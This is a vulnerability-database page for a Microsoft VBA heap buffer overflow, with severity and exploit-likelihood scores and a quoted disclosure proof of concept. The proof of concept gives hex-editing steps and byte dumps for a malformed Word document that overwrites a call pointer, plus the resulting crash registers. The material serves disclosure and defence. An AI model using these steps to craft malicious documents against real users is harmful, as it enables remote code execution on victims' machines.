CPE, which stands for Common Platform Enumeration, is a standardized scheme for naming hardware, software, and operating systems. CPE provides a structured naming scheme to uniquely identify and classify information technology systems, platforms, and packages based on certain attributes such as vendor, product name, version, update, edition, and language.
CWE, or Common Weakness Enumeration, is a comprehensive list and categorization of software weaknesses and vulnerabilities. It serves as a common language for describing software security weaknesses in architecture, design, code, or implementation that can lead to vulnerabilities.
CAPEC, which stands for Common Attack Pattern Enumeration and Classification, is a comprehensive, publicly available resource that documents common patterns of attack employed by adversaries in cyber attacks. This knowledge base aims to understand and articulate common vulnerabilities and the methods attackers use to exploit them.
Services & Price
Help & Info
Search : CVE id, CWE id, CAPEC id, vendor or keywords in CVE
Heap-based buffer overflow in VBE.DLL and VBE6.DLL of Microsoft Visual Basic for Applications (VBA) SDK 5.0 through 6.3 allows remote attackers to execute arbitrary code via a document with a long ID parameter.
CVE Informations
Metrics
Metrics
Score
Severity
CVSS Vector
Source
V2
10
AV:N/AC:L/Au:N/C:C/I:C/A:C
nvd@nist.gov
EPSS
EPSS is a scoring model that predicts the likelihood of a vulnerability being exploited.
EPSS Score
The EPSS model produces a probability score between 0 and 1 (0 and 100%). The higher the score, the greater the probability that a vulnerability will be exploited.
Date
EPSS V0
EPSS V1
EPSS V2 (> 2022-02-04)
EPSS V3 (> 2025-03-07)
EPSS V4 (> 2025-03-17)
2022-02-06
–
–
44.63%
–
–
2023-03-12
–
–
–
94.46%
–
2024-02-18
–
–
–
94.69%
–
2024-06-02
–
–
–
94.69%
–
2024-07-07
–
–
–
94.33%
–
2024-12-22
–
–
–
94.78%
–
2025-01-12
–
–
–
94.28%
–
2025-01-19
–
–
–
94.28%
–
2025-03-18
–
–
–
–
74.81%
2025-03-18
–
–
–
–
74.81,%
EPSS Percentile
The percentile is used to rank CVE according to their EPSS score. For example, a CVE in the 95th percentile according to its EPSS score is more likely to be exploited than 95% of other CVE. Thus, the percentile is used to compare the EPSS score of a CVE with that of other CVE.
Publication date : 2003-09-02 22h00 +00:00 Author : eEye Digital Security Team EDB Verified : Yes
source: https://www.securityfocus.com/bid/8534/info
A vulnerability has been discovered in Microsoft Visual Basic for Applications. The vulnerability occurs because the software fails to perform sufficient boundary checks when parsing specific properties of malformed documents. As a result, a malformed document may trigger a buffer overrun within the affected application, effectively allowing arbitrary code to run.
Internet Explorer is also reportedly an attack vector, since it may call helper applications when handling certain document types.
1. Open Word.
2. Select "Insert" - "Object"
3. Select "MSPropertyTreeCtl Class" (You can also select other objects such
as ChoiceBox Class, etc)
4. Save .doc file.
5. Modify .doc file by using binary editor as follows:
5a. Find following strings in doc file.
ID="{1FE45957-2625-4B1E-ADEF-EC04B7F34CCF}"
Document=ThisDocument/&H00000000
Name="Project"
HelpContextID="0"
VersionCompatible32="393222000"
CMG="1E1C0125015D1B611B611B611B61"
DPB="4B4954458046804680"
GC="787A679868986867"
5b. Change "ID" from:
+0000 49 44 3D 22 7B 31 46 45 34 35 39 35 37 2D 32 36 ID="{1FE45957-26
+0010 32 35 2D 34 42 31 45 2D 41 44 45 46 2D 45 43 30 25-4B1E-ADEF-EC0
+0020 34 42 37 46 33 34 43 43 46 7D 22 0D 0A 44 6F 63 4B7F34CCF}"..Doc
+0030 75 6D 65 6E 74 3D 54 68 69 73 44 6F 63 75 6D 65 ument=ThisDocume
to the following:
+0000 49 44 3D 22 7B 61 61 61 61 61 61 61 61 61 61 61 ID="{aaaaaaaaaaa
+0010 61 61 61 61 61 61 61 61 61 61 61 61 61 61 61 61 aaaaaaaaaaaaaaaa
+0020 61 61 61 61 61 61 61 61 61 61 61 61 61 61 61 61 aaaaaaaaaaaaaaaa
+0030 61 61 61 61 41 42 43 44 00 00 00 00 aaaaABCD....
6. Open modified doc file.
7. You'll be able to see an access violation such as...
65106055 FF 52 0C call dword ptr [edx+0Ch]
EAX = 023219A4 EBX = 0232194B ECX = 02311AC4
EDX = 44434241 ESI = 0231186C EDI = 02321940
EIP = 65106055 ESP = 0012CBA0 EBP = 0012CBB8
**UPDATE: Core Security Technologies has developed a working commercial exploit for its CORE IMPACT product. This exploit is not otherwise publicly available or known to be circulating in the wild.